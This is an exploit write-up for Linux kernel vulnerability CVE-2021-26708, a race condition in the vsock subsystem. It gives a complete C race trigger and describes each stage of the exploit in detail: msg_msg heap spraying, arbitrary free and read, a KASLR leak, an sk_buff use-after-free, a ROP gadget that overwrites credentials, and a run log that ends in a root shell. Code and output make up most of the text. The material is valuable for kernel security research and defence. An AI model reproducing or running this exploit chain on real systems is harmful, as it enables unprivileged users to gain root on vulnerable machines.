The following describes in detail how CVE-2021-26708 is exploited through the race condition in vsock_stream_setsockopt(). Two threads are required to reproduce it. The first thread calls setsockopt():
setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
&size, sizeof(unsigned long));
The second thread changes the virtual socket transport while vsock_stream_setsockopt() is trying to acquire the socket lock. It does so by reconnecting the virtual socket:
struct sockaddr_vm addr = {
.svm_family = AF_VSOCK,
};
addr.svm_cid = VMADDR_CID_LOCAL;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
addr.svm_cid = VMADDR_CID_HYPERVISOR;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:
if (vsk->transport) {
if (vsk->transport == new_transport)
return 0;
/* transport->release() must be called with sock lock acquired.
* This path can only be taken during vsock_stream_connect(),
* where we have already held the sock lock.
* In the other cases, this function is called on a new socket
* which is not assigned to any transport.
*/
vsk->transport->release(vsk);
vsock_deassign_transport(vsk);
}
vsock_stream_connect() holds the socket lock while vsock_stream_setsockopt() in the parallel thread is also trying to acquire it, which is exactly what is needed to hit the race condition. When the second connect() is performed with a different svm_cid, vsock_deassign_transport() is called. This function executes virtio_transport_destruct(), which frees vsock_sock.trans, and vsk->transport is set to NULL. When vsock_stream_connect() releases the socket lock, vsock_stream_setsockopt() can continue. It calls vsock_update_buffer_size(), which then calls transport->notify_buffer_size(). Here transport holds a stale value from a local variable, which no longer matches vsk->transport (now NULL).
When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:
void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
struct virtio_vsock_sock *vvs = vsk->trans;
if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
*val = VIRTIO_VSOCK_MAX_BUF_SIZE;
vvs->buf_alloc = *val;
virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}
Here, vvs is a pointer to kernel memory that has already been freed in virtio_transport_destruct(). The size of struct virtio_vsock_sock is 64 bytes, so the object lives in the kmalloc-64 slab cache. The buf_alloc field has type u32 and is located at offset 40. VIRTIO_VSOCK_MAX_BUF_SIZE is 0xFFFFFFFFUL. The value of *val is controlled by the attacker, and its four least significant bytes are written into the freed memory.
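The clamp-then-store behaviour can be modelled in user space. This is only a sketch of the arithmetic in the snippet above; stored_buf_alloc() is a hypothetical helper name, not a kernel function.

```c
#include <assert.h>
#include <stdint.h>

#define VIRTIO_VSOCK_MAX_BUF_SIZE 0xFFFFFFFFULL

/*
 * Hypothetical model: the value that lands in the u32 buf_alloc field
 * for a given 64-bit *val, following the clamp shown in
 * virtio_transport_notify_buffer_size().
 */
static uint32_t stored_buf_alloc(uint64_t val)
{
	if (val > VIRTIO_VSOCK_MAX_BUF_SIZE)
		val = VIRTIO_VSOCK_MAX_BUF_SIZE;
	assert(val <= UINT32_MAX);	/* always true after the clamp */
	return (uint32_t)val;
}
```

A value that fits in 32 bits is stored unchanged, while anything larger is clamped to 0xFFFFFFFF, so the attacker-chosen four bytes have to be passed as a value below 2^32.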
==Fuzzing==
The syzkaller fuzzer could not reproduce this crash, so I decided to investigate it myself. But why did the fuzzer fail? A look at vsock_update_buffer_size() gives the answer:
if (val != vsk->buffer_size &&
transport && transport->notify_buffer_size)
transport->notify_buffer_size(vsk, &val);
vsk->buffer_size = val;
notify_buffer_size() is called only when val differs from the current buffer_size. In other words, every setsockopt() call with SO_VM_SOCKETS_BUFFER_SIZE has to pass a different size value. So I wrote the following code:
/*
 * AF_VSOCK vulnerability trigger.
 * It's a PoC just for fun.
 * Author: Alexander Popov.
 */
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <time.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>

#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)
#define MAX_RACE_LAG_USEC 50

int vsock = -1;
int tfail = 0;
pthread_barrier_t barrier;

/* Meet the other thread at the barrier, then busy-wait for lag_nsec. */
int thread_sync(long lag_nsec)
{
	int ret = -1;
	struct timespec ts0;
	struct timespec ts;
	long delta_nsec = 0;

	ret = pthread_barrier_wait(&barrier);
	if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) {
		perror("[-] pthread_barrier_wait");
		return EXIT_FAILURE;
	}

	ret = clock_gettime(CLOCK_MONOTONIC, &ts0);
	if (ret != 0) {
		perror("[-] clock_gettime");
		return EXIT_FAILURE;
	}

	while (delta_nsec < lag_nsec) {
		ret = clock_gettime(CLOCK_MONOTONIC, &ts);
		if (ret != 0) {
			perror("[-] clock_gettime");
			return EXIT_FAILURE;
		}
		delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 +
			     ts.tv_nsec - ts0.tv_nsec;
	}

	return EXIT_SUCCESS;
}

/* Reconnect the socket with a different CID to switch the transport. */
void *th_connect(void *arg)
{
	int ret = -1;
	long lag_nsec = *((long *)arg) * 1000;
	struct sockaddr_vm addr = {
		.svm_family = AF_VSOCK,
	};

	ret = thread_sync(lag_nsec);
	if (ret != EXIT_SUCCESS) {
		tfail++;
		return NULL;
	}

	addr.svm_cid = VMADDR_CID_LOCAL;
	connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

	addr.svm_cid = VMADDR_CID_HYPERVISOR;
	connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

	return NULL;
}

/* Set a buffer size that differs on every call. */
void *th_setsockopt(void *arg)
{
	int ret = -1;
	long lag_nsec = *((long *)arg) * 1000;
	struct timespec tp;
	unsigned long size = 0;

	ret = thread_sync(lag_nsec);
	if (ret != EXIT_SUCCESS) {
		tfail++;
		return NULL;
	}

	clock_gettime(CLOCK_MONOTONIC, &tp);
	size = tp.tv_nsec;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
		   &size, sizeof(unsigned long));

	return NULL;
}

int main(void)
{
	int ret = -1;
	unsigned long size = 0;
	long loop = 0;
	pthread_t th[2] = { 0 };

	vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
	if (vsock == -1)
		err_exit("[-] open vsock");

	printf("[+] AF_VSOCK socket is opened\n");

	size = 1;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE,
		   &size, sizeof(unsigned long));
	size = 0xfffffffffffffffdlu;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
		   &size, sizeof(unsigned long));

	ret = pthread_barrier_init(&barrier, NULL, 2);
	if (ret != 0)
		err_exit("[-] pthread_barrier_init");

	for (loop = 0; loop < 30000; loop++) {
		long tmo1 = 0;
		long tmo2 = loop % MAX_RACE_LAG_USEC;

		printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2);

		ret = pthread_create(&th[0], NULL, th_connect, &tmo1);
		if (ret != 0)
			err_exit("[-] pthread_create #0");

		ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2);
		if (ret != 0)
			err_exit("[-] pthread_create #1");

		ret = pthread_join(th[0], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join #0");

		ret = pthread_join(th[1], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join #1");

		if (tfail) {
			printf("[-] some thread got troubles\n");
			exit(EXIT_FAILURE);
		}
	}

	ret = close(vsock);
	if (ret)
		perror("[-] close");

	printf("[+] now see your warnings in the kernel log\n");
	return 0;
}
The size value here is taken from the nanosecond count returned by clock_gettime(), so it is likely to differ on every call. Stock syzkaller does not do this: when it generates fuzzing input, the syscall argument values are fixed and do not change during execution.
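The effect of the val != vsk->buffer_size check can be illustrated with a small user-space model. The sketch below is not kernel code: struct mock_vsock and both helper functions are hypothetical, and the model starts from a buffer size of 0 purely for simplicity.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for struct vsock_sock; only what the model needs. */
struct mock_vsock {
	uint64_t buffer_size;
	unsigned int notify_calls;	/* simulated notify_buffer_size() calls */
};

/* Same guard as in vsock_update_buffer_size(): notify only on a change. */
static void mock_update_buffer_size(struct mock_vsock *vsk, uint64_t val)
{
	assert(vsk != NULL);
	if (val != vsk->buffer_size)
		vsk->notify_calls++;
	vsk->buffer_size = val;
}

/*
 * Issue n updates with sizes start, start + step, start + 2 * step, ...
 * and return how many of them reached the notify path.
 */
static unsigned int notifications_for(uint64_t start, uint64_t step,
				      unsigned int n)
{
	struct mock_vsock vsk = { .buffer_size = 0, .notify_calls = 0 };

	for (unsigned int i = 0; i < n; i++)
		mock_update_buffer_size(&vsk, start + (uint64_t)i * step);
	return vsk.notify_calls;
}
```

With a constant size only the first call reaches the notify path, while a size that changes on each call reaches it every time, which is why the trigger above derives the size from the clock.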
==The power of four bytes==
I chose Fedora 33 Server with kernel 5.10.11-200.fc33.x86_64 as the research target and set out to bypass SMEP and SMAP.
As a first step, I looked for a stable heap spray: a user-space activity that makes the kernel allocate another 64-byte object at the location of the freed virtio_vsock_sock. Several experiments confirmed that the freed virtio_vsock_sock can be overwritten, so heap spraying is feasible. Eventually I settled on the msgsnd() syscall. It creates a struct msg_msg in kernel space; see the pahole output:
struct msg_msg {
struct list_head m_list; /* 0 16 */
long int m_type; /* 16 8 */
size_t m_ts; /* 24 8 */
struct msg_msgseg * next; /* 32 8 */
void * security; /* 40 8 */
/* size: 48, cachelines: 1, members: 5 */
/* last cacheline: 48 bytes */
};
The header comes first and the message data follows it. If struct msgbuf in user space has a 16-byte mtext, the corresponding msg_msg is allocated in the kmalloc-64 slab cache. The 4-byte write-after-free corrupts the void *security pointer at offset 40. The msg_msg.security field points to kernel data allocated by lsm_msg_msg_alloc(), which security_msg_msg_free() frees when the msg_msg is received. Therefore, overwriting the lower half of the security pointer (its four least significant bytes on little-endian x86_64) yields an arbitrary free.
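A short user-space model makes the size and offset arithmetic concrete. It is a sketch only: struct mock_msg_msg mirrors the pahole layout above with plain integers, the helper names are hypothetical, and the result of the 4-byte write assumes a little-endian machine such as x86_64.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Mock of the 48-byte msg_msg header from the pahole output (x86_64). */
struct mock_msg_msg {
	uint64_t m_list[2];	/* struct list_head: two pointers */
	int64_t m_type;
	uint64_t m_ts;
	uint64_t next;
	uint64_t security;
};

/* Allocation size for a message carrying mtext_len bytes inline. */
static size_t msg_alloc_size(size_t mtext_len)
{
	return sizeof(struct mock_msg_msg) + mtext_len;
}

/* Apply a 4-byte store at byte offset 40 and return the new pointer value. */
static uint64_t security_after_write(uint64_t security, uint32_t val)
{
	struct mock_msg_msg msg = { .security = security };

	assert(offsetof(struct mock_msg_msg, security) == 40);
	memcpy((unsigned char *)&msg + 40, &val, sizeof(val));
	return msg.security;
}
```

A 16-byte mtext gives exactly 64 bytes, and the store replaces only the low 32 bits of the pointer. The upper 32 bits are kept, so the new value can reach any address that shares them with the old pointer.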
==Kernel Information Leak==
The same technique as for [https://www.pwnwiki.org/index.php?title=CVE-2019-18683_Linux_kernel_through_5.3.8_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E CVE-2019-18683] is used here. The second connect() of the virtual socket calls vsock_deassign_transport() and sets vsk->transport to NULL, so when vsock_stream_setsockopt() calls virtio_transport_send_pkt_info() after the memory corruption, a kernel warning appears:
WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34
...
CPU: 1 PID: 6739 Comm: racer Tainted: G W 5.10.11-200.fc33.x86_64 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common]
...
RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80
RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0
RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000
R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008
R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0
FS: 00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0
Call Trace:
virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common]
vsock_update_buffer_size+0x5f/0x70 [vsock]
vsock_stream_setsockopt+0x128/0x270 [vsock]
...
Debugging with gdb shows that the RCX register contains the kernel address of the freed virtio_vsock_sock, and the RBX register contains the kernel address of vsock_sock.
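Pulling a register value out of such a warning is plain text parsing. The following is a minimal sketch; parse_reg() is a hypothetical helper and assumes the "NAME: hexvalue" layout of the register lines shown above.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Find "NAME: <hex>" in one line of kernel log text and return the value.
 * Returns 0 if the register name does not occur on the line.
 */
static uint64_t parse_reg(const char *line, const char *name)
{
	char key[16];
	const char *p;
	int n;

	assert(line != NULL && name != NULL);
	n = snprintf(key, sizeof(key), "%s: ", name);
	if (n < 0 || (size_t)n >= sizeof(key))
		return 0;
	p = strstr(line, key);
	if (p == NULL)
		return 0;
	return strtoull(p + n, NULL, 16);
}
```

Applied to the register line of the warning above, parse_reg(line, "RCX") returns 0xffff88811e845b80 and parse_reg(line, "RBX") returns 0xffff888103416ac0.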
==Achieve arbitrary reading==
===From arbitrary free to use-after-free===
Turning the arbitrary free into a use-after-free takes three steps:
1. Free an object at the leaked kernel address
2. Perform a heap spray to overwrite that object with controlled data
3. Use the corrupted object for privilege escalation
The System V message implementation in the kernel limits the data stored together with the header to DATALEN_MSG, that is, PAGE_SIZE minus sizeof(struct msg_msg). If you send a larger message, the remainder is stored in a list of message segments. msg_msg contains struct msg_msgseg *next, which points to the first segment, and size_t m_ts, which stores the message size. When overwriting the object, you can therefore put controlled values in msg_msg.m_ts and msg_msg.next.

The payload:
#define PAYLOAD_SZ 40
void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
{
struct msg_msg *msg_ptr;
xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0xa5, PAGE_SIZE * 4);
printf("[+] adapt the msg_msg spraying payload:\n");
msg_ptr = (struct msg_msg *)xattr_addr;
msg_ptr->m_type = 0x1337;
msg_ptr->m_ts = ARB_READ_SZ;
msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
msg_ptr,
msg_ptr->m_type, &(msg_ptr->m_type),
msg_ptr->m_ts, &(msg_ptr->m_ts),
msg_ptr->next, &(msg_ptr->next));
}
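The split between the header block and the segment list is simple arithmetic. The sketch below assumes a 4096-byte page, the 48-byte header from the pahole output, and a struct msg_msgseg that holds only its next pointer (8 bytes); the macro and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE   4096UL
#define MODEL_MSG_HDR     48UL	/* sizeof(struct msg_msg), from pahole */
#define MODEL_SEG_HDR     8UL	/* assumption: msg_msgseg is one pointer */
#define MODEL_DATALEN_MSG (MODEL_PAGE_SIZE - MODEL_MSG_HDR)
#define MODEL_DATALEN_SEG (MODEL_PAGE_SIZE - MODEL_SEG_HDR)

/* Bytes of an m_ts-byte message stored right after the msg_msg header. */
static size_t head_bytes(size_t m_ts)
{
	return m_ts < MODEL_DATALEN_MSG ? m_ts : MODEL_DATALEN_MSG;
}

/* Bytes that are reached through the msg_msg.next segment chain. */
static size_t segment_bytes(size_t m_ts)
{
	size_t head = head_bytes(m_ts);

	assert(head <= m_ts);
	return m_ts - head;
}

/* Number of segments needed for the remainder. */
static size_t segment_count(size_t m_ts)
{
	return (segment_bytes(m_ts) + MODEL_DATALEN_SEG - 1) / MODEL_DATALEN_SEG;
}
```

For the m_ts of 6096 bytes that appears in the exploit log, 4048 bytes come from the header block and the remaining 2048 bytes are read through the single segment that msg_msg.next points to.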
But how can msg_msg be used to read kernel data? Reading the msgrcv() system call documentation, I found a good solution: msgrcv() with the MSG_COPY flag:
MSG_COPY (since Linux 3.8)
Nondestructively fetch a copy of the message at the ordinal position in the queue
specified by msgtyp (messages are considered to be numbered starting at 0).
This flag makes the kernel copy the message data to user space without removing the message from the queue. MSG_COPY is available if the kernel is built with CONFIG_CHECKPOINT_RESTORE=y, which is the case for Fedora Server.
===Steps of arbitrary reading===
1. Preparation:
* Use sched_getaffinity() and CPU_COUNT() to count the available CPUs (the exploit needs at least two);
* Open /dev/kmsg for parsing;
* mmap() the spray_data memory area and configure userfaultfd() for its last part;
* Start a separate pthread to handle userfaultfd() events;
* Start 127 threads for the setxattr()&userfaultfd() heap spray over msg_msg and hang them on a pthread_barrier.
2. Get the kernel address of the original msg_msg:
* Win the race on the virtual socket;
* After the second connect(), wait 35 microseconds in a busy loop;
* Call msgsnd() on a separate message queue; after the memory corruption, the msg_msg object is placed at the location of virtio_vsock_sock;
* Parse the kernel log and save the kernel address of msg_msg from the kernel warning (RCX register);
* Also save the kernel address of vsock_sock from the RBX register.
3. Use a corrupted msg_msg to perform an arbitrary free of the original msg_msg:
* Use four bytes of the original msg_msg address as SO_VM_SOCKETS_BUFFER_SIZE for the memory corruption;
* Win the race on the virtual socket;
* Call msgsnd() right after the second connect(); the msg_msg is placed at the location of virtio_vsock_sock and gets corrupted;
* The security pointer of the corrupted msg_msg now stores the address of the original msg_msg (from step 2);
* If the corruption of msg_msg.security from the setsockopt() thread happens while msgsnd() is being handled, the SELinux permission check fails;
* In that case msgsnd() returns -1 and the corrupted msg_msg is destroyed; freeing msg_msg.security frees the original msg_msg.
4. Overwrite the original msg_msg with a controlled payload:
* Right after the failed msgsnd(), the exploit calls pthread_barrier_wait(), which wakes up the 127 heap-spraying pthreads;
* These pthreads execute setxattr() with the payload;
* The original msg_msg is overwritten with controlled data, and its msg_msg.next pointer stores the address of the vsock_sock object.
5. Read the contents of the vsock_sock kernel object into user space by receiving a message from the queue that stores the overwritten msg_msg:
ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
==Find the target of attack==
Here is what I found in the leaked vsock_sock memory:
1. Many pointers to objects in dedicated slab caches, such as PINGv6 and sock_inode_cache.
2. The struct mem_cgroup *sk_memcg pointer is at offset 664 in vsock_sock.sk. The mem_cgroup structure is allocated in the kmalloc-4k slab cache.
3. The const struct cred *owner pointer is at offset 840 in vsock_sock and stores the address of the credentials that can be overwritten for privilege escalation.
4. The void (*sk_write_space)(struct sock *) function pointer is at offset 688 in vsock_sock.sk and is set to the address of the sock_def_write_space() kernel function. It can be used to calculate the KASLR offset.
Here is how the exploit extracts these pointers from the leaked memory:
#define SK_MEMCG_OFFSET 664
#define SK_MEMCG_RD_LOCATION (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET 840
#define OWNER_CRED_RD_LOCATION (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET 688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET)
/*
* From Linux kernel 5.10.11-200.fc33.x86_64:
* function pointer for calculating KASLR secret
*/
#define SOCK_DEF_WRITE_SPACE 0xffffffff819851b0lu
unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;
/* ... */
sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
sk_memcg, SK_MEMCG_RD_LOCATION);
owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
owner_cred, OWNER_CRED_RD_LOCATION);
sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);
kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);
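The offsets and the KASLR calculation can be checked against the values printed in the exploit log further below. This is a sketch of the arithmetic only; the MODEL_ macros and helper names are hypothetical, and DATALEN_MSG is taken as 4096 - 48 = 4048.

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_DATALEN_MSG          4048ULL	/* PAGE_SIZE - sizeof(struct msg_msg) */
#define MODEL_SOCK_DEF_WRITE_SPACE 0xffffffff819851b0ULL	/* unrandomized address */

/* Byte offset of a vsock_sock field inside the leaked kmem buffer. */
static uint64_t rd_location(uint64_t field_offset)
{
	return MODEL_DATALEN_MSG + field_offset;
}

/* KASLR offset derived from the leaked sock_def_write_space pointer. */
static uint64_t kaslr_offset_from(uint64_t leaked_write_space)
{
	assert(leaked_write_space >= MODEL_SOCK_DEF_WRITE_SPACE);
	return leaked_write_space - MODEL_SOCK_DEF_WRITE_SPACE;
}
```

The field offsets 664, 688 and 840 map to 4712, 4736 and 4888 in the leaked buffer, and the leaked pointer ffffffffab9851b0 gives an offset of 2a000000, matching the log.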
==Implement Use-after-free on sk_buff==
Network buffers in the Linux kernel are represented by struct sk_buff. This object has an associated skb_shared_info with a destructor_arg field, which can be used for control-flow hijacking. The network data and skb_shared_info are placed in the same kernel memory block, pointed to by sk_buff.head. Therefore, creating a 2800-byte network packet in user space causes skb_shared_info to be allocated in the kmalloc-4k slab cache, the same cache that holds mem_cgroup objects.
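The size-class reasoning used here, and for the 64-byte objects earlier, can be sketched as a lookup over the general-purpose kmalloc caches. The list of sizes below is the usual set on x86_64 and should be treated as an assumption, as should the 320-byte size of skb_shared_info (derived from 4096 minus the 3776-byte SKB_SHINFO_OFFSET used later). Packet headers and alignment are ignored, and kmalloc_bucket() is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>

/* Returns the kmalloc-N size class for a request, or 0 if above 8192. */
static size_t kmalloc_bucket(size_t size)
{
	static const size_t buckets[] = {
		8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
	};

	assert(size > 0);
	for (size_t i = 0; i < sizeof(buckets) / sizeof(buckets[0]); i++)
		if (size <= buckets[i])
			return buckets[i];
	return 0;
}
```

A 48-byte msg_msg header plus 16 bytes of mtext lands in kmalloc-64, and 2800 bytes of data plus a 320-byte skb_shared_info lands in kmalloc-4k.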
I came up with the following steps:
1. Use socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) to create one client socket and 32 server sockets
2. Prepare a 2800-byte buffer in user space and memset() it with 0x42
3. Use sendto() to send this buffer from the client socket to each server socket, which creates sk_buff objects in kmalloc-4k. Do this on every available CPU using sched_setaffinity()
4. Perform the arbitrary read procedure on vsock_sock
5. Calculate a possible sk_buff kernel address as sk_memcg plus 4096 (the next element of kmalloc-4k)
6. Perform the arbitrary read on this possible sk_buff address
7. If 0x4242424242424242lu is found at the location of the network data, the real sk_buff has been found; go to step 8. Otherwise, add 4096 to the possible sk_buff address and go to step 6
8. Start 32 pthreads for the setxattr()&userfaultfd() heap spray over sk_buff and hang them on a pthread_barrier
9. Perform the arbitrary free of the sk_buff kernel address
10. Call pthread_barrier_wait(), which lets the 32 heap-spraying pthreads execute setxattr() and overwrite skb_shared_info
11. Use recv() to receive the network messages from the server sockets.
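The address stepping and the marker check from steps 5 to 7 can be sketched as two small helpers. Both function names are hypothetical, and the model works on plain integers and a local buffer rather than on kernel memory.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define MODEL_KMALLOC_4K 4096ULL

/* Candidate address for the given attempt: sk_memcg + 4096, + 8192, ... */
static uint64_t candidate_skb(uint64_t sk_memcg, unsigned int attempt)
{
	return sk_memcg + MODEL_KMALLOC_4K * (attempt + 1ULL);
}

/* True if the first 8 bytes of the leaked data are the 0x42 fill pattern. */
static int is_marker(const unsigned char *data)
{
	uint64_t v;

	assert(data != NULL);
	memcpy(&v, data, sizeof(v));
	return v == 0x4242424242424242ULL;
}
```

With the sk_memcg value from the exploit log, ffff9125c42f9000, the first candidate is ffff9125c42fa000, which is the address the log reports as the possible skb location.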
==Arbitrary write via skb_shared_info==
The following is a valid payload that overwrites the sk_buff object:
#define SKB_SIZE 4096
#define SKB_SHINFO_OFFSET 3776
#define MY_UINFO_OFFSET 256
#define SKBTX_DEV_ZEROCOPY (1 << 3)
void prepare_xattr_vs_skb_spray(void)
{
struct skb_shared_info *info = NULL;
xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0x0, PAGE_SIZE * 4);
info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
info->tx_flags = SKBTX_DEV_ZEROCOPY;
info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;
uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);
skb_shared_info resides in the sprayed data exactly at offset SKB_SHINFO_OFFSET, which is 3776 bytes. The skb_shared_info.destructor_arg pointer stores the address of a struct ubuf_info. Because the kernel address of the attacked sk_buff is known, a fake ubuf_info can be placed at MY_UINFO_OFFSET in the network buffer. In the resulting payload layout, the fake ubuf_info sits at offset 256 and skb_shared_info at offset 3776 of the 4096-byte block.

Now for the destructor_arg callback:
/*
* A single ROP gadget for arbitrary write:
* mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
* Here rdi stores uinfo_p address, rcx is 0, rsi is 1
*/
uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */
I could not find a gadget in vmlinuz-5.10.11-200.fc33.x86_64 that met my needs, so I researched and constructed this primitive myself.
The callback function pointer stores the address of the ROP gadget. RDI holds the first argument of the callback, which is the address of ubuf_info itself, so RDI + 8 points to ubuf_info.desc. The gadget loads ubuf_info.desc into RDX, which now contains the address of the effective user ID and group ID minus one byte. That byte is important: when the gadget writes the quadword 1 from RSI to the memory pointed to by RDX, the effective uid and gid are overwritten with zeros. The same procedure is repeated until the privileges are escalated to root. The output of the whole exploit run is as follows:
[a13x@localhost ~]$ ./vsock_pwn
=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================
[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready
[+] stage I: collect good msg_msg locations
[+] go racing, show wins:
save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
save msg_msg ffff9125c25a4640 in msq 12 in slot 1
save msg_msg ffff9125c25a4780 in msq 22 in slot 2
save msg_msg ffff9125c3668a40 in msq 78 in slot 3
[+] stage II: arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4d00
kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins:
[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000
[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4640
kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11
[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb
[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
start at 0x7f0d91120004
skb_shared_info at 0x7f0d91120ec4
tx_flags 0x8
destructor_arg 0xffff9125c42fa100
callback 0xffffffffab64f6d4
desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15
[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30
[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
